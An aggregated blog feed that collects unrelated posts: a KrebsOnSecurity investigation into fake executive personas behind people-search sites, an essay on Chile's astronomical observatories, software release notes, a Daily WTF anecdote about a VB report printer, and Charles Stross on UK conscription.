Entrepreneur #6 is Stephen Curry, who is quoted as CEO of CocoSign[.]com, a website that claims to offer an “easier, quicker, safer eSignature solution for small and medium-sized businesses.” Incidentally, the same photo for Stephen Curry #6 is also used in this “article” for #22 Jake Smith, who is named as the owner of a different company.

Stephen Curry, aka Jake Smith, aka no such person.

Mr. Curry’s LinkedIn profile shows a young man seated at a table in front of a laptop, but an online image search shows this is another stock photo. Cocosign[.]com was registered in June 2020 via Alibaba Cloud Beijing. No ownership details are available in the domain registration records.

Listed at #13 in that 30 Entrepreneurs article is Eden Cheng, who is cited as co-founder of PeopleFinderFree[.]com. KrebsOnSecurity could not find a LinkedIn profile for Ms. Cheng, but a search on her profile image from that Entrepreneurs article shows the same photo for sale at Shutterstock and other stock photo sites.

DomainTools says PeopleFinderFree was registered through Alibaba Cloud, Beijing. Attempts to purchase reports through PeopleFinderFree produce a notice saying the full report is only available via Spokeo.com.

Lynda Fairly is Entrepreneur #24, and she is quoted as co-founder of Numlooker[.]com, a domain registered in April 2021 through Alibaba in China. Searches for people on Numlooker forward visitors to Spokeo.

The photo next to Ms. Fairly’s quote in Entrepreneurs matches that of a LinkedIn profile for Lynda Fairly. But a search on that photo shows this same portrait has been used by many other identities and names, including a woman from the United Kingdom who’s a cancer survivor and mother of five; a licensed marriage and family therapist in Canada; a software security engineer at Quora; a journalist on Twitter/X; and a marketing expert in Canada.

Cocofinder[.]com is a people-search service that launched in Sept. 2019, through Alibaba in China. Cocofinder lists its market officer as Harriet Chan, but Ms. Chan’s LinkedIn profile is just as sparse on work history as the other people-search owners mentioned already. An image search online shows that outside of LinkedIn, the profile photo for Ms. Chan has only ever appeared in articles at pay-to-play media sites, like this one from outbackteambuilding.com.

Perhaps because Cocodoc and Cocosign both sell software services, they are actually tied to a physical presence in the real world — in Singapore (15 Scotts Rd. #03-12 15, Singapore). But it’s difficult to discern much from this address alone.

Who’s behind all this people-search chicanery? A January 2024 review of various people-search services at the website techjury.com states that Cocofinder is a wholly-owned subsidiary of a Chinese company called Shenzhen Duiyun Technology Co.

“Though it only finds results from the United States, users can choose between four main search methods,” Techjury explains. Those include people search, phone, address and email lookup. This claim is supported by a Reddit post from three years ago, wherein the Reddit user “ProtectionAdvanced” named the same Chinese company.

Is Shenzhen Duiyun Technology Co. responsible for all these phony profiles? How many more fake companies and profiles are connected to this scheme? KrebsOnSecurity found other examples that didn’t appear directly tied to other fake executives listed here, but which nevertheless are registered through Alibaba and seek to drive traffic to Spokeo and other data brokers. For example, there’s the winsome Daniela Sawyer, founder of FindPeopleFast[.]net, whose profile is flogged in paid stories at entrepreneur.org.

Google currently turns up nothing else for in a search for Shenzhen Duiyun Technology Co. Please feel free to sound off in the comments if you have any more information about this entity, such as how to contact it. Or reach out directly at krebsonsecurity @ gmail.com.

A mind map highlighting the key points of research in this story. Click to enlarge. Image: KrebsOnSecurity.com

ANALYSIS

It appears the purpose of this network is to conceal the location of people in China who are seeking to generate affiliate commissions when someone visits one of their sites and purchases a people-search report at Spokeo, for example. And it is clear that Spokeo and others have created incentives wherein anyone can effectively white-label their reports, and thereby make money brokering access to peoples’ personal information.

Spokeo’s Wikipedia page says the company was founded in 2006 by four graduates from Stanford University. Spokeo co-founder and current CEO Harrison Tang has not yet responded to requests for comment.

Intelius is owned by San Diego based PeopleConnect Inc., which also owns Classmates.com, USSearch, TruthFinder and Instant Checkmate. PeopleConnect Inc. in turn is owned by H.I.G. Capital, a $60 billion private equity firm. Requests for comment were sent to H.I.G. Capital. This story will be updated if they respond.

BeenVerified is owned by a New York City based holding company called The Lifetime Value Co., a marketing and advertising firm whose brands include PeopleLooker, NeighborWho, Ownerly, PeopleSmart, NumberGuru, and Bumper, a car history site.

Ross Cohen, chief operating officer at The Lifetime Value Co., said it’s likely the network of suspicious people-finder sites was set up by an affiliate. Cohen said Lifetime Value would investigate to determine if this particular affiliate was driving them any sign-ups.

All of the above people-search services operate similarly. When you find the person you’re looking for, you are put through a lengthy (often 10-20 minute) series of splash screens that require you to agree that these reports won’t be used for employment screening or in evaluating new tenant applications. Still more prompts ask if you are okay with seeing “potentially shocking” details about the subject of the report, including arrest histories and photos.

Only at the end of this process does the site disclose that viewing the report in question requires signing up for a monthly subscription, which is typically priced around $35. Exactly how and from where these major people-search websites are getting their consumer data — and customers — will be the subject of further reporting here.

The main reason these various people-search sites require you to affirm that you won’t use their reports for hiring or vetting potential tenants is that selling reports for those purposes would classify these firms as consumer reporting agencies (CRAs) and expose them to regulations under the Fair Credit Reporting Act (FCRA).

These data brokers do not want to be treated as CRAs, and for this reason their people search reports typically don’t include detailed credit histories, financial information, or full Social Security Numbers (Radaris reports include the first six digits of one’s SSN).

But in September 2023, the U.S. Federal Trade Commission found that TruthFinder and Instant Checkmate were trying to have it both ways. The FTC levied a $5.8 million penalty against the companies for allegedly acting as CRAs because they assembled and compiled information on consumers into background reports that were marketed and sold for employment and tenant screening purposes.

The FTC also found TruthFinder and Instant Checkmate deceived users about background report accuracy. The FTC alleges these companies made millions from their monthly subscriptions using push notifications and marketing emails that claimed that the subject of a background report had a criminal or arrest record, when the record was merely a traffic ticket.

The FTC said both companies deceived customers by providing “Remove” and “Flag as Inaccurate” buttons that did not work as advertised. Rather, the “Remove” button removed the disputed information only from the report as displayed to that customer; however, the same item of information remained visible to other customers who searched for the same person.

The FTC also said that when a customer flagged an item in the background report as inaccurate, the companies never took any steps to investigate those claims, to modify the reports, or to flag to other customers that the information had been disputed.

There are a growing number of online reputation management companies that offer to help customers remove their personal information from people-search sites and data broker databases. There are, no doubt, plenty of honest and well-meaning companies operating in this space, but it has been my experience that a great many people involved in that industry have a background in marketing or advertising — not privacy.

Also, some so-called data privacy companies may be wolves in sheep’s clothing. On March 14, KrebsOnSecurity published an abundance of evidence indicating that the CEO and founder of the data privacy company OneRep.com was responsible for launching dozens of people-search services over the years.

Finally, some of the more popular people-search websites are notorious for ignoring requests from consumers seeking to remove their information, regardless of which reputation or removal service you use. Some force you to create an account and provide more information before you can remove your data. Even then, the information you worked hard to remove may simply reappear a few months later.

This aptly describes countless complaints lodged against the data broker and people search giant Radaris. On March 8, KrebsOnSecurity profiled the co-founders of Radaris, two Russian brothers in Massachusetts who also operate multiple Russian-language dating services and affiliate programs.

The truth is that these people-search companies will continue to thrive unless and until Congress begins to realize it’s time for some consumer privacy and data protection laws that are relevant to life in the 21st century. Duke University adjunct professor Justin Sherman says virtually all state privacy laws exempt records that might be considered “public” or “government” documents, including voting registries, property filings, marriage certificates, motor vehicle records, criminal records, court documents, death records, professional licenses, bankruptcy filings, and more.

“Consumer privacy laws in California, Colorado, Connecticut, Delaware, Indiana, Iowa, Montana, Oregon, Tennessee, Texas, Utah, and Virginia all contain highly similar or completely identical carve-outs for ‘publicly available information’ or government records,” Sherman said.

,

LongNowStumbling Towards First Light

Stumbling Towards First Light

A satellite capturing high-resolution images of Chile on the afternoon of October 18, 02019, would have detected at least two signs of unusual human activity.

Pictures taken over Santiago, Chile’s capital city, would have shown numerous plumes of smoke slanting away from buses, subway stations and commercial buildings that had been torched by rioters. October 18 marked the start of the Estallido Social (Social Explosion), a months-long series of violent protests that pitched this South American country of 19 million people into a crisis from which it has yet to fully emerge.

On the same day, the satellite would also have recorded a fresh disturbance on Cerro Las Campanas, a mountain in the Atacama Desert some 300 miles north of Santiago. A deep circular trench, 200 feet in diameter, had recently been drilled into the rock on the flattened summit. The trench will eventually hold the concrete foundations of the Giant Magellan Telescope, a $2 billion instrument that will have 10 times the resolving power of the Hubble Space Telescope. But on October 18 the excavation looked like one of the cryptic shapes that surround the Atacama Giant, an humanoid geoglyph constructed by the indigenous people of the Andes that has been staring up at the desert sky since long before Ferdinand Magellan set sail in 01519.

I see the riots and the unfinished telescope as markers at the temporal extremes of human agency. At one end, the twitchy impatience of politics seduces us with the illusion that a Molotov cocktail, an election or a military coup will set the world to rights. At the opposite point of the spectrum, the slow, painstaking and often-inconclusive work of cosmology attempts to fathom the origins of time itself.

That both pursuits should take place in Chile is not in itself remarkable: leading-edge science coexists with political chaos in countries as varied as Russia and the United States. Yet in Chile, a so-called “emerging economy,” the juxtaposition of first-world astronomy with third-world grievances raises questions about planning, progress, and the distribution of one of humanity’s rarest assets.

Extremely patient risk capital

The next era of astronomy will depend on instruments so complicated and costly that no single nation can build them. A list of contributors to the James Webb Space Telescope, for example, includes 35 universities and 280 public agencies and private companies in 14 countries. This aggregation of design, engineering, construction and software talent from around the planet is a hallmark of “big science” projects. But large telescopes are also emblematic of the outsized timescales of “long science.” They depend on a fragile amalgam of trust, loyalty, institutional prestige and sheer endurance that must sustain a project for two or three decades before “first light,” or the moment when a telescope actually begins to gather data.

“It takes a generation to build a telescope,” Charles Alcock, director of the Harvard-Smithsonian Center for Astrophysics and a member of Giant Magellan Telescope (GMT) board, said some years ago. Consider the logistics involved in a single segment of the GMT’s construction: the process of fabricating its seven primary mirrors, each measuring 27 feet in diameter and using 17 metric tons of specialized Japanese glass. The only facility capable of casting mirrors this large (by melting the glass inside a clam-shaped oven at 2,100 degrees Fahrenheit) is situated deep beneath University of Arizona football stadium. It takes three months for the molten glass to cool. Over the next four years, the mirror will be mounted, ground and slowly polished to a precision of around one millionth of an inch.  The GMT’s first mirror was cast in 02005; its seventh will be finished sometime in 02027. Building the 1,800-ton steel structure that will hold these mirrors, shipping the enormous parts by sea, assembling the telescope atop Cerro Las Campanas, and then testing and calibrating its incommunicably delicate instruments will take several more years.

Not surprisingly, these projects don’t even attempt to raise their full budgets up front. Instead, they operate on a kind of faith, scraping together private grants and partial transfers from governments and universities to make incremental progress, while constantly lobbying for additional funding. At each stage, they must defend nebulous objectives (“understanding the nature of dark matter”) against the claims of disciplines with more tangible and near-term goals, such as fusion energy. And given the very real possibility that they will not be completed, big telescopes require what private equity investors might describe as the world’s most patient risk capital.

Few countries have been more successful at attracting this kind of capital than Chile. The GMT is one of three colossal observatories currently under construction in the Atacama Desert. The $1.6 billion Extremely Large Telescope, which will house a 128-foot main mirror inside a dome nearly as tall as the Statue of Liberty, will be able to directly image and study the atmospheres of potentially habitable exoplanets. The $1.9 billion Vera T. Rubin Telescope will use a 3.500 megapixel digital camera to map the entire night sky every three days, creating the first 3-D virtual map of the visible cosmos while recording changes in stars and events like supernovas. Two other comparatively smaller projects, the Fred Young Sub-millimeter Telescope and the Cherenkov Telescope Array, are also in the works.

Chile is already home to the $1.4 billion Atacama Large Millimeter Array (ALMA), a complex of 66 huge dish antennas some 16,000 feet above sea level that used to be described as the world’s largest and most expensive land-based astronomical project. And over the last half-century, enormous observatories at Cerro Tololo, Cerro Pachon, Cerro Paranal, and Cerro La Silla have deployed hundreds of the world’s most sophisticated telescopes and instruments to obtain foundational evidence in every branch of astronomy and astrophysics.

By the early 02030s, a staggering 70 percent of the world’s entire land-based astronomical data gathering capacity is expected to be concentrated in an swath of Chilean desert about the size of Oregon.

Stumbling Towards First Light
A map of major telescopes and astronomical sites in Northern Chile. Map by Jacob Sujin Kuppermann

Blurring imaginary borders

Collectively, this cluster of observatories represents expenditures and collaboration on a scale similar to “big science” landmarks such as the Large Hadron Collider or the Manhattan Project. Those enterprises were the product of ambitious, long-term strategies conceived and executed by a succession of visionary leaders. But according to Barbara Silva, a historian of science at Chile’s Universidad Alberto Hurtado, there has been no grand plan, and no one can legitimately take credit for turning Chile into the global capital of astronomy.

In several papers she has published on the subject, Silva describes a decentralized and largely uncoordinated 175-year process driven by relationships—at times competitive, at times collaborative—between scientists and institutions that were trying to solve specific problems that required observations from the Southern Hemisphere.

In 01849, for example, the U.S. Navy sent Lieutenant James Melville Gillis to Chile to obtain measurements that would contribute to an international effort to calculate the earth’s orbit. Gillis built a modest observatory on Santa Lucía Hill, in what is now central Santiago, and trained several local assistants. Three years later, when Gillis completed his assignment, the Chilean government purchased the facility and its instruments and used them to establish the Observatorio Astronómico Nacional—one of the first in Latin America.

Stumbling Towards First Light
An 01872 illustration by Recaredo Santos Tornero of the Observatorio Astronómico Nacional in Santiago de Chile.

Half a century later, representatives from another American institution, the University of California’s Lick Observatory, built a second observatory in Chile and began exploring locations in the mountains of the Atacama Desert. They were among the first to document the conditions that would eventually turn Chile into an astronomy mecca: high altitude, extremely low humidity, stable weather and enormous stretches of uninhabited land with minimal light pollution.

During the Cold War, the director of Chile’s Observatorio Astronómico Nacional, Federico Ruttland, saw an opportunity to exploit the growing scientific competition among industrialized powers by fostering a host of cooperation agreements with astronomers and universities in the Northern Hemisphere. Delegations of astronomers from the U.S., Europe and the Soviet Union began visiting Chile to explore locations for large observatories. Germany, France, Belgium, the Netherlands and Sweden pooled resources to form the European Southern Observatory. By the late 1960s, several parallel but independent projects were underway to build the first generation of world-class observatories in Chile. Each of them involved so many partners they tended to “blur the imaginary borders of nations,” Silva writes.

The historical record provides few clues as to why these partners thought Chile would be a safe place to situate priceless instruments that are meant to be operated for a half-century or longer. Silva has found some accounts indicating that Chile was seen as “somehow trustworthy, with a reputation… of being different from the rest of Latin America.” That perception, Silva writes, may have been a self-serving “discourse construct” based largely on the accounts of British and American business interests that dominated the mining of Chilean saltpeter and copper over the previous century.

Anyone looking closely at Chile’s political history would have seen a tumultuous pattern not very different from that of neighboring countries such as Argentina, Peru or Brazil. In the century and a half following its declaration of independence from Spain in 01810,  Chile adopted nine different constitutions. A small, landed oligarchy controlled extractive industries and did little to improve the lot of agricultural and mining workers. By the middle of the century, Chile had half a dozen major political parties ranging from communists to Catholic nationalists, and a generation of increasingly radicalized voters was clamoring for change.

In 01970 Salvador Allende became the first Marxist president elected in a liberal democracy in Latin America. His ambitious program to build a socialist society was cut short by a U.S.-supported military coup in 01973. Gen. Augusto Pinochet ruled Chile for next 17 years, brutally suppressing any opposition while deregulating and privatizing the economy along lines recommended by the “Chicago Boys”— a group of economists trained under Milton Friedman at the University of Chicago.

Soviet astronomers left Chile immediately after the coup. American and European scientists continued to work at facilities such as the Inter-American Observatory at Cerro Tololo throughout this period, but no new observatories were announced during the dictatorship.

Negotiating access to time

With the return of democracy in 01990, Chile entered a period of growth and stability that would last for three decades. A succession of center-left and center-right administrations carried out social and economic reforms, foreign investment poured in, and Chile came to be seen as a model of market-oriented development. Poverty, which had affected more than 50 percent of the population in 01980s, dropped to single digits by the 02010s.

Foreign astronomers quickly returned to Chile and began negotiating bilateral agreements to build the next generation of large telescopes. This time, Chilean researchers urged the government to introduce a new requirement: in exchange for land and tax exemptions, any new international observatory built in the country would need to reserve 10 percent of observation time for Chilean astronomers. It was a bold move, because access to these instruments is fiercely contested.

Bárbara Rojas-Ayala, an astrophysicist at Chile’s University of Tarapacá, belongs to a generation of young astronomers who attribute their careers directly to this decision. She says that although the new observatories agreed to the “10 percent rule,” it was initially not enforced—in part because there were not enough qualified Chilean astronomers in the mid-01990s. She credits two distinguished Chilean astronomers, Mónica Rubio and María Teresa Ruiz, with convincing government officials that only by enforcing the rule would Chile begin to cultivate national astronomy talent.

Stumbling Towards First Light
Maria Teresa Ruiz (Left) alongside two of the four Auxiliary Telescopes of the ESO’s Very Large Telescope at the Paranal Observatory in the Atacama Region of Chile. Photo by the International Astronomical Union, released under the Creative Commons Attribution 4.0 International License

The strategy worked. Rojas-Ayala was one of hundreds of Chilean college students who began completing graduate studies at leading universities in the Global North and then returning to teach and conduct research, knowing they would have access to the most coveted instruments. Between the mid-01990s and the present, the number of Chilean universities with astronomy or astrophysics departments jumped from 5 to 24. The community of professional Chilean astronomers has grown ten-fold, to nearly 300, and some 800 undergraduate and post-graduate students are now studying astronomy or related fields in Chilean universities. Chilean firms are also now allowed to compete for the specialized services that are needed to maintain and operate these observatories, creating a growing ecosystem of companies and institutions such as the Center for Astrophysics and Related Technologies.

By the 02010s, Chile could legitimately boast to have leapfrogged a century of scientific development to join the vanguard of a discipline historically dominated by the richest industrial powers—something very few countries in the Global South have ever achieved.

From 30 pesos to 30 years

The Estallido Social of 02019 opened a wide crack in this narrative. The riots were triggered by a 30-peso increase (around $0.25) in the basic fare for Santiago’s metro system. But the rioters quickly embraced a slogan, “No son 30 pesos ¡son 30 años!,” which torpedoed the notion that the post-Pinochet era has been good for most Chileans. Protesters denounced the poor quality of public schools, unaffordable healthcare and a privatized pension system that barely covers the needs of many retirees. Never mind that Chile is objectively in better shape that most of its neighboring countries—the riots showed that Chileans now measure themselves against the living standards of the countries where the GMT and other telescopes were designed. And many of them question whether democracy and neo-liberal economics can ever reverse the country’s persistent wealth inequality.

Stumbling Towards First Light
Protestors at Plaza Baquedano, Santiago, Chile in October 02019. Photos by Carlos Figueroa, CC Attribution-Share Alike 4.0 International

When Gabriel Boric, a 35-year-old left-wing former student leader, won a run-off election for president against a right-wing candidate in 2021, many young Chileans were jubilant. They hoped that a referendum to adopt a new, progressive constitution (to replace the one drafted by the Pinochet regime) would finally set Chile on a more promising path. These hopes were soon disappointed: in 02022 the new constitution was rejected by voters, who considered it far too radical. A year later, a more conservative draft constitution also failed to garner enough votes.

The impasse has left Chile in the grip of a political malaise that will be sadly familiar to people in Europe and the United States. Chileans seemingly can’t agree on how to govern themselves, and their visions of the future appear to be irreconcilable.

For astronomers like Rojas-Ayala, the Estallido Social and its aftermath are a painful reminder of an incongruity that they experience every day. “I feel so privileged to be able to work in these extraordinary facilities,” she said. “My colleagues and I have these amazing careers; and yet we live in a country where there is still a lot of poverty.” Since poverty in Chile has what she calls a “predominantly female face,” Rojas-Ayala frequently speaks at schools and volunteers for initiatives that encourage girls and young women to choose science careers.

Rojas-Ayala has seen a gradual increase in the proportion of women in her field, and she is also encouraged by signs that astronomy is permeating Chilean culture in positive ways. A recent conference on “astrotourism” gathered educators and tour operators who cater to the thousands of stargazers who arrive in Chile each year, eager to experience its peerless viewing conditions at night and then visit the monumental Atacama observatories during the day. José Masa, one Chile’s most celebrated astronomers, has filled small soccer stadiums with multi-generational audiences for non-technical talks on solar eclipses and related phenomena. And a growing list of community organizations is helping to protect Chile’s dark skies from light pollution.

Astronomy is also enriching the work of Chilean novelists and film-makers. “Nostalgia for the Light,” a documentary by Pedro Guzmán, intertwines the story of the growth of Chilean observatories with testimonies from the relatives of political prisoners who were murdered and buried in the Atacama Desert during the Pinochet regime. The graves were unmarked, and many relatives have spent years looking for these remains. Guzman, in the words of the critic Peter Bradshaw, sees astronomy “not simply an ingenious metaphor for political issues, or a way of anesthetizing the pain by claiming that it is all tiny, relative to the reaches of space. Astronomy is a mental discipline, a way of thinking, feeling and clarifying, and a way of insisting on humanity in the face of barbarism.”

Despite their frustration with democracy and their pessimism about the immediate future, Chileans are creating a haven for this way of thinking. Much of what we hope to learn about the universe in the coming decades will depend on their willingness to maintain this uneasy balance.

Planet DebianDirk Eddelbuettel: ciw 0.0.2 on CRAN: Updates

A first revision of the still only one-week old (at CRAN) package ciw has been released to CRAN! It provides is a single (efficient) function incoming() (now along with an alias ciw()) which summarises the state of the incoming directories at CRAN. I happen to like having these things at my (shell) fingertips, so it goes along with (still draft) wrapper ciw.r that will be part of the next littler release.

For example, when I do this right now as I type this, I see (typically less than one second later)

See ciw.r --help or ciw.r --usage for more. Alternatively, in your R session, you can call ciw::incoming() (or now ciw::ciw()) for the same result (and/or load the package first).

This release adds some packaging touches, brings the new alias ciw() as well as a state variable with all (known) folder names and some internal improvements for dealing with error conditions. The NEWS entry follows.

Changes in version 0.0.2 (2024-03-20)

  • The package README and DESCRIPTION have been expanded

  • An alias ciw can now be used for incoming

  • Network error handling is now more robist

  • A state variable known_folders lists all CRAN folders below incoming

Courtesy of my CRANberries, there is also a diffstat report for this release.

If you like this or other open-source work I do, you can sponsor me at GitHub.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Planet DebianJonathan Dowland: aerc email client

my aerc

I started looking at aerc, a new Terminal mail client, in around 2019. At that time it was promising, but ultimately not ready yet for me, so I put it away and went back to neomutt which I have been using (in one form or another)   all century.

These days, I use neomutt as an IMAP client which is perhaps what it's worst at: prior to that, and in common with most users (I think), I used it to read local mail, either fetched via offlineimap or directly on my mail server. I switched to using it as a (slow, blocking) IMAP client because I got sick of maintaining offlineimap (or mbsync), and I started to use neomutt to   read my work mail, which was too large (and rate limited) for local syncing.

This year I noticed that aerc had a new maintainer who was presenting about it at FOSDEM, so I thought I'd take another look. It's come a long way: far enough to actually displace neomutt for my day-to-day mail use. In particular, it's a much better IMAP client.

I still reach for neomutt for some tasks, but I'm now using aerc for most things.

aerc is available in Debian, but I recommending building from upstream source at the moment as the project is quite fast-moving.

Worse Than FailureCodeSOD: Do you like this page? Check [Yes] or [No]

In the far-off era of the late-90s, Jens worked for a small software shop that built tools for enterprise customers. It was a small shop, and most of the projects were fairly small- usually enough for one developer to see through to completion.

A co-worker built a VB4 (the latest version available) tool that interfaced with an Oracle database. That co-worker quit, and that meant this tool was Jens's job. The fact that Jens had never touched Visual Basic before meant nothing.

With the original developer gone, Jens had to go back to the customer for some knowledge transfer. "Walk me through how you use the application?"

"The main thing we do is print reports," the user said. They navigated through a few screens worth of menus to the report, and got a preview of it. It was a simple report with five records displayed on each page. The user hit "Print", and then a dialog box appeared: "Print Page 1? [Yes] [No]". The user clicked "Yes". "Print Page 2? [Yes] [No]". The user started clicking "no", since the demo had been done and there was no reason to burn through a bunch of printer paper.

"Wait, is this how this works?" Jens asked, not believing his eyes.

"Yes, it's great because we can decide which pages we want to print," the user said.

"Print Page 57? [Yes] [No]".

With each page, the dialog box took longer and longer to appear, the program apparently bogging down.

Now, the code is long lost, and Jens quickly forgot everything they learned about VB4 once this project was over (fair), so instead of a pure code sample, we have here a little pseudocode to demonstrate the flow:

for k = 1 to runQuery("SELECT MAX(PAGENO) FROM ReportTable WHERE ReportNumber = :?", iRptNmbr)
	dataset = runQuery("SELECT * FROM ReportTable WHERE ReportNumber = :?", iRptNmbr)
	for i = 0 to dataset.count - 1
	  if dataset.pageNo = k then
	    useRecord(dataset)
		dataset.MoveNext
	  end
	next
	if MsgBox("Do you want to print page k?", vbYesNo) = vbYes then
		print(records)
	end
next

"Print Page 128? [Yes] [No]"

The core thrust is that we query the number of pages each time we run the loop. Then we get all of the rows for the report, and check each row to see if they're supposed to be on the page we're printing. If they are, useRecord stages them for printing. Once they're staged, we ask the user if they should be printed.

"Why doesn't it just give you a page selector, like Word does?" Jens asked.

"The last guy said that wasn't possible."

"Print Page 170? [Yes] [No]"

Jens, ignorant of VB, worried that he stepped on a land-mine and had just promised the customer something the tool didn't support. He walked the statement back and said, "I'll look into it, to see if we can't make it better."

It wasn't hard for Jens to make it better: not re-running the query for each page and not iterating across the rows of previous pages on every page boosted performance.

"Print Page 201? [Yes] [No]"

Adding a word-processor-style page selector wasn't much harder. If not for that change, that poor user might be clicking "No" to this very day.

"Print Page 215? [Yes] [No]"

[Advertisement] Utilize BuildMaster to release your software with confidence, at the pace your business demands. Download today!

365 TomorrowsBee’s Knees

Author: W.F. Peate A child’s doll sat in the deserted street pockmarked with missile craters. Little orphan Tara tugged away from our hands and reached for the doll. “Booby trap,” shouted a military man. Quick as a cobra he pushed me, Tara and my grandfather behind him so he could take the force of the […]

The post Bee’s Knees appeared first on 365tomorrows.

Planet DebianIustin Pop: Corydalis 2024.12.0 released

I’ve been working for the past few weeks on Corydalis, and was in no hurry to make a release, but last evening I found the explanation for a really, really, really annoying issue: unintended “zooming� on touch interfaces in the image viewer. Or more precisely, I found this post from 2015 (9 years ago!): https://webkit.org/blog/5610/more-responsive-tapping-on-ios/ and I finally understood things. And decided this was the best choice for cutting a new release.

Of course, the release contains more things, see the changelog on the release page: https://github.com/iustin/corydalis/releases/tag/v2024.12.0. And of course, it’s up on http://demo.corydalis.io.

And after putting out the new release, I saw that release tagging is in the pre-built binaries still broken, and found the reason at https://github.com/actions/checkout/issues/290. Will fix for the next release… The stream of bugs never ends 😉

,

Charles StrossSame bullshit, new tin

I am seeing newspaper headlines today along the lines of British public will be called up to fight if UK goes to war because 'military is too small', Army chief warns, and I am rolling my eyes.

The Tories run this flag up the mast regularly whenever they want to boost their popularity with the geriatric demographic who remember national service (abolished 60 years ago, in 1963). Thatcher did it in the early 80s; the Army general staff told her to piss off. And the pols have gotten the same reaction ever since. This time the call is coming from inside the house—it's a general, not a politician—but it still won't work because changes to the structure of the British society and economy since 1979 (hint: Thatcher's revolution) make it impossible.

Reasons it won't work: there are two aspects, infrastructure and labour.

Let's look at infrastructure first: if you have conscripts, it follows that you need to provide uniforms, food, and beds for them. Less obviously, you need NCOs to shout at them and teach them to brush their teeth and tie their bootlaces (because a certain proportion of your intake will have missed out on the basics). The barracks that used to be used for a large conscript army were all demolished or sold off decades ago, we don't have half a million spare army uniforms sitting in a warehouse somewhere, and the army doesn't currently have ten thousand or more spare training sergeants sitting idle.

Russia could get away with this shit when they invaded Ukraine because Russia kept national service, so the call-up mostly got adults who had been through the (highly abusive) draft some time in the preceding years. Even so, they had huge problems with conscripts sleeping rough or being sent to the front with no kit.

The UK is in a much worse place where it comes to conscription: first you have to train the NCOs (which takes a couple of years as you need to start with experienced and reasonably competent soldiers) and build the barracks. Because the old barracks? Have mostly been turned into modern private housing estates, and the RAF airfields are now civilian airports (but mostly housing estates) and that's a huge amount of construction to squeeze out of a British construction industry that mostly does skyscrapers and supermarkets these days.

And this is before we consider that we're handing these people guns (that we don't have, because there is no national stockpile of half a million spare SA-80s and the bullets to feed them, never mind spare operational Challenger-IIs) and training them to shoot. Rifles? No problem, that'll be a few weeks and a few hundred rounds of ammunition per soldier until they're competent to not blow their own foot off. But anything actually useful on the battlefield, like artillery or tanks or ATGMs? Never mind the two-way radio kit troops are expected to keep charged and dry and operate, and the protocol for using it? That stuff takes months, years, to acquire competence with. And firing off a lot of training rounds and putting a lot of kilometres on those tank tracks (tanks are exotic short-range vehicles that require maintenance like a Bugatti, not a family car). So the warm conscript bodies are just the start of it—bringing back conscription implies equipping them, so should be seen as a coded gimme for "please can has 500% budget increase" from the army.

Now let's discuss labour.

A side-effect of conscription is that it sucks able-bodied young adults out of the workforce. The UK is currently going through a massive labour supply crunch, partly because of Brexit but also because a chunk of the work force is disabled due to long COVID. A body in a uniform is not stacking shelves in Tesco or trading shares in the stock exchange. A body in uniform is a drain on the economy, not a boost.

If you want a half-million strong army, then you're taking half a million people out of the work force that runs the economy that feeds that army. At peak employment in 2023 the UK had 32.8 million fully employed workers and 1.3 million unemployed ... but you can't assume that 1.3 million is available for national service: a bunch will be medically or psychologically unfit or simply unemployable in any useful capacity. (Anyone who can't fill out the forms to register as disabled due to brain fog but who can't work due to long COVID probably falls into this category, for example.) Realistically, economists describe any national economy with 3% or less unemployment as full employment because a labour market needs some liquidity in order to avoid gridlock. And the UK is dangerously close to that right now. The average employment tenure is about 3 years, so a 3% slack across the labour pool is equivalent to one month of unemployment between jobs—there's barely time to play musical chairs, in other words.

If a notional half-million strong conscript force optimistically means losing 3% of the entire work force, that's going to cause knock-on effects elsewhere in the economy, starting with an inflationary spiral driven by wage rises as employers compete to fill essential positions: that didn't happen in the 1910-1960 era because of mass employment, collective bargaining, and wage and price controls, but the post-1979 conservative consensus has stripped away all these regulatory mechanisms. Market forces, baby!

To make matters worse, they'll be the part of the work force who are physically able to do a job that doesn't involve sitting in a chair all day. Again, Russia has reportedly been drafting legally blind diabetic fifty-somethings: it's hard to imagine them being effective soldiers in a trench war. Meanwhile, if you thought your local NHS hospital was over-stretched today, just wait until all the porters and cleaners get drafted so there's nobody to wash the bedding or distribute the meals or wheel patients in and out of theatre for surgery. And the same goes for your local supermarket, where there's nobody left to take rotting produce off the shelves and replace it with fresh—or, more annoyingly, no truckers to drive HGVs, automobile engineers to service your car, or plumbers to fix your leaky pipes. (The latter three are all gimmes for any functioning military because military organizations are all about logistics first because without logistics the shooty-shooty bang-bangs run out of ammunition really fast.) And you can't draft builders because they're all busy throwing up the barracks for the conscripts to eat, sleep, and shit in, and anyway, without builders the housing shortage is going to get even worse and you end up with more inflation ...

There are a pile of vicious feedback loops in play here, but what it boils down to is: we lack the infrastructure to return to a mass military, whether it's staffed by conscription or traditional recruitment (which in the UK has totally collapsed since the Tories outsourced recruiting to Capita in 2012). It's not just the bodies but the materiel and the crown estate (buildings to put them in). By the time you total up the cost of training an infantryman, the actual payroll saved by using conscripts rather than volunteers works out at a tiny fraction of their cost, and is pissed away on personnel who are not there willingly and will leave at the first opportunity. Meanwhile the economy has been systematically asset-stripped and looted and the general staff can't have an extra £200Bn/year to spend on top of the existing £55Bn budget because Oligarchs Need Yachts or something.

Maybe if we went back to a 90% marginal rate of income tax, reintroduced food rationing, raised the retirement age to 80, expropriated all private property portfolios worth over £1M above the value of the primary residence, and introduced flag-shagging as a mandatory subject in primary schools—in other words: turn our backs on every social change, good or bad, since roughly 1960, and accept a future of regimented poverty and militarism—we could be ready to field a mass conscript army armed with rifles on the battlefields of 2045 ... but frankly it's cheaper to invest in killer robots. Or better still, give peace a chance?

Planet DebianColin Watson: apt install everything?

On Mastodon, the question came up of how Ubuntu would deal with something like the npm install everything situation. I replied:

Ubuntu is curated, so it probably wouldn’t get this far. If it did, then the worst case is that it would get in the way of CI allowing other packages to be removed (again from a curated system, so people are used to removal not being self-service); but the release team would have no hesitation in removing a package like this to fix that, and it certainly wouldn’t cause this amount of angst.

If you did this in a PPA, then I can’t think of any particular negative effects.

OK, if you added lots of build-dependencies (as well as run-time dependencies) then you might be able to take out a builder. But Launchpad builders already run arbitrary user-submitted code by design and are therefore very carefully sandboxed and treated as ephemeral, so this is hardly novel.

